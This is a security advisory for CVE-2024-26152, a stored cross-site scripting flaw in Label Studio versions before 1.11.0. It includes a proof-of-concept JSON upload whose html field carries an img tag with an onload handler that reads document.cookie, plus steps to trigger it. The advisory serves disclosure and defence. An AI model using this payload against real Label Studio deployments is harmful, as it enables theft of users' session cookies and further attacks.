CVE-2024-26152: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Summary
On all Label Studio versions prior to 1.11.0, data imported via file upload feature is not properly sanitized prior to being rendered within a Choices
or Labels
tag, resulting in an XSS vulnerability.
Details
Need permission to use the “data import” function. This was reproduced on Label Studio 1.10.1.
PoC
Create a project.
Upload a file containing the payload using the “Upload Files” function.
The following are the contents of the files used in the PoC
{
"data": {
"prompt": "labelstudio universe image",
"images": [
{
"value": "id123#0",
"style": "margin: 5px",
"html": "<img width='400' src='https://labelstud.io/_astro/images-tab.64279c16_ZaBSvC.avif' onload=alert(document.cookie)>"
}
]
}
}
Select the text-to-image generation labeling template of Ranking and scoring
Select a task
Check that the script is running
Impact
Malicious scripts can be injected into the code, and when linked with vulnerabilities such as CSRF, it can cause even greater damage. In particular, It can become a source of further attacks, especially when linked to social engineering.
References
Detect and mitigate CVE-2024-26152 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →